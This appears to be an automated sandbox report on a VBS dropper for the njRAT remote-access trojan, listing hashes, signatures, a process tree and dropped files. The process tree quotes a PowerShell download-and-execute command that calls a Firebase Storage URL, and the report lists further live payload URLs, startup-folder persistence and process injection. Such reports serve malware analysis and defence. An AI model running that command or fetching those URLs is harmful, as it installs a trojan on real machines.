Analysis
- max time kernel: 150s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20240220-en
- resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
- submitted: 02-05-2024 13:34
Static task: static1
Behavioral task: behavioral1
Sample: c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
Resource: win7-20240220-en
General
- Target: c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
- Size: 271B
- MD5: b9acaac18eee9b5cde0c6defbe2c1caa
- SHA1: 6f8cb34d61f9136e96345684846edf49dfa976bc
- SHA256: c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1
- SHA512: 70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12
Malware Config
Extracted
- https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8
Extracted
- https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
- https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503
Extracted
- njrat
- 0.7d
- H
- splitter: |'|'|
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   process
    5     2976  powershell.exe
    7     1932  powershell.exe
- Drops startup file (1 IoC)
  Processes:
    description   ioc                                                                                   process
    File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sCs.vbs  powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description                          pid   process         target process
    PID 1932 set thread context of 2292  1932  powershell.exe  aspnet_compiler.exe
- Processes:
    pid   process
    2976  powershell.exe
    1932  powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid   process
    2976  powershell.exe
    2976  powershell.exe
    2976  powershell.exe
    1932  powershell.exe
- Suspicious use of AdjustPrivilegeToken (31 IoCs)
  Processes:
    description                         pid   process
    Token: SeDebugPrivilege             2976  powershell.exe
    Token: SeDebugPrivilege             1932  powershell.exe
    Token: SeDebugPrivilege             2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
    Token: 33                           2292  aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege   2292  aspnet_compiler.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes:
    description                       pid   process         target process
    PID 2172 wrote to memory of 2976  2172  WScript.exe     powershell.exe
    PID 2172 wrote to memory of 2976  2172  WScript.exe     powershell.exe
    PID 2172 wrote to memory of 2976  2172  WScript.exe     powershell.exe
    PID 2976 wrote to memory of 2392  2976  powershell.exe  WScript.exe
    PID 2976 wrote to memory of 2392  2976  powershell.exe  WScript.exe
    PID 2976 wrote to memory of 2392  2976  powershell.exe  WScript.exe
    PID 2392 wrote to memory of 1932  2392  WScript.exe     powershell.exe
    PID 2392 wrote to memory of 1932  2392  WScript.exe     powershell.exe
    PID 2392 wrote to memory of 1932  2392  WScript.exe     powershell.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
    PID 1932 wrote to memory of 2292  1932  powershell.exe  aspnet_compiler.exe
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))
      - Blocklisted process makes network request
      - Drops startup file
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WScript.exe
         Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps1
            - Blocklisted process makes network request
            - Suspicious use of SetThreadContext
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
               Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
               - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 9553862ed1e00bd3e2b56370f296d36c
  SHA1: ee293e6e654d5d43a55183e56f27059100e2bd17
  SHA256: 89c9a0fb1fae35b89bba64d15a913e333ab79977a89df34a812e3a735094d8fe
  SHA512: 6a5593c6a933c20d52325c783ea5277ab47426f396250e14c530d25c7138770dde391c86562ce46482698e140ede84e59ea7dcc9304823eecc38ad568b34352c
- C:\Users\Public\sCs.ps1
  Filesize: 1KB
  MD5: e0e7ea9409eb39ae9d9e06ea8d2acd94
  SHA1: 3b8ab9de2c853a0238f3024eb8905ab81b8f634c
  SHA256: 93b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713
  SHA512: 14cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f
- C:\Users\Public\sCs.vbs
  Filesize: 166B
  MD5: c3e1b2c797679d84c76dcdd5bb81db0d
  SHA1: f178c6888aa88ef7e940dd1b572ea9ac8c30c56c
  SHA256: cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b
  SHA512: be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c
- memory/1932-27-0x0000000002A10000-0x0000000002A1C000-memory.dmp
  Filesize: 48KB
- memory/2292-30-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2292-28-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2292-32-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2292-34-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2292-36-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB
- memory/2292-37-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2292-38-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2292-39-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB
- memory/2976-16-0x000007FEF568E000-0x000007FEF568F000-memory.dmp
  Filesize: 4KB
- memory/2976-5-0x000000001B530000-0x000000001B812000-memory.dmp
  Filesize: 2.9MB
- memory/2976-6-0x0000000002290000-0x0000000002298000-memory.dmp
  Filesize: 32KB
- memory/2976-4-0x000007FEF568E000-0x000007FEF568F000-memory.dmp
  Filesize: 4KB
- memory/2976-7-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB
- memory/2976-20-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB
- memory/2976-8-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB
- memory/2976-9-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB
- memory/2976-15-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB
- memory/2976-11-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB
- memory/2976-10-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp
  Filesize: 9.6MB